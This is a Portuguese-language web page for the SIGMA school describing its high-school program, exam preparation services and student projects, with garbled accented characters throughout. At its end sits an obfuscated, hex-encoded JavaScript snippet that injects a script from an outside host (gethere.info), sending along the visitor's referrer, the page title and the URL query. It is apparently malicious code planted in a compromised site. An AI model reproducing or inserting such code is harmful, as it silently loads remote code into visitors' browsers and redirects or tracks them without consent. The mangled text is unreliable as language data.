Ensino MA�dio –A�1A? A� 3A? sA�rie

_MG_0444

 

 

O SIGMA investe na prA?tica pedagA?gica inovadora. Pioneiro na utilizaA�A?o do livro digital em tablets, vem capacitando seus alunos por meio do desenvolvimento de novas habilidades, inclusA?o de novas tecnologias, realizaA�A?o de multitarefas, criatividade, raciocA�nio e pesquisas. Com isso, o SIGMA vem preparando seus alunos para o futuro. Prova disso sA?o os altos A�ndices de aprovaA�A?o em vestibulares, como os da UnB, alA�m de excelente desempenho no Enem. Cada vez mais, o SIGMA se consolida como referA?ncia no processo de formaA�A?o integral dos jovens.

 


MissA?o:
_MG_9818

Acompanhamos a evoluA�A?o da sociedade e da tecnologia, e temas como A�tica, solidariedade, voluntariado, responsabilidade, integridade, autonomia e responsabilidade fazem parte do nosso cotidiano escolar. HA? alguns anos, nossa escola inovou e passou a usar material digital no ensino mA�dio. O dia a dia dos alunos do ensino mA�dio A� ocupado por aulas e muitos projetos que integram a formaA�A?o total do indivA�duo, em que eles desenvolvem habilidades fundamentais para uma sociedade emA�que o saber e o ser estA?o em posiA�A?o de igualdade.

ServiA�os de apoio com foco no PAS, no Enem e em vestibulares:

– Secretaria de Cursos
– Simulados e avaliaA�A�es
– RevisA?o de conteA?do
– Aulas de aprofundamento das disciplinas de MatemA?tica, FA�sica e QuA�mica.Ensino MA�dio_1
– Aulas experimentais de FA�sica, QuA�mica e Biologia em laboratA?rios.

Projetos:A�

– AvaliaA�A�es e simulados: oportunidade de realizar testes com o mesmo grau de dificuldade dos vestibulares das melhores universidades do paA�s e de exames como o PAS, o ENEM e os concursos pA?blicos.
– Monitoria online: tirar suas dA?vidas com professores conectados 24 horas. Basta acessar no site da escola, pelo computador, tablet ou smartphone, e apontar a dA?vida.
– Secretaria de cursos: disponibiliza informaA�A�es sobre processos seletivos de todo o paA�s, promovendo atividades que auxiliam os alunos na escolha da profissA?o.

 

Ensino MA�dio 2


– Sigma MA?ndi:
simulaA�A�es de organismos nacionais e internacionais, como a CA?mara dos Deputados, a OrganizaA�A?o das NaA�A�es Unidas (ONU), a OrganizaA�A?o Mundial do ComA�rcio (OMC), alA�m do Pnuma, da OMS, entre outros.
– Afterclass:
aprofundamento acadA?mico intenso, com professores renomados, mA?ltiplas resoluA�A�es de exercA�cios, aulA�es interdisciplinares, aulas planejadas, avaliaA�A�es constantes e simulados.
– Junior Achievement: alunos da 2A? sA�rie montam uma miniempresa jA?nior. O objetivo A� despertar o espA�rito empreendedor nos jovens e preparA?-los para o mercado de trabalho.
– Semana de Arte Moderna: atividade multidisciplinar que aborda a cultura brasileira de 1922. SA?o realizadas apresentaA�A�es teatrais e releitura de obras plA?sticas e literA?rias.
– Semana Cultural: atividade que visa A� interaA�A?o dos alunos por meio de diversas atividades, como: prA?ticas esportivas, jogos eletrA?nicos, caracterizaA�A?o gincanas, experimentos cientA�ficos, entre outros.

 var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}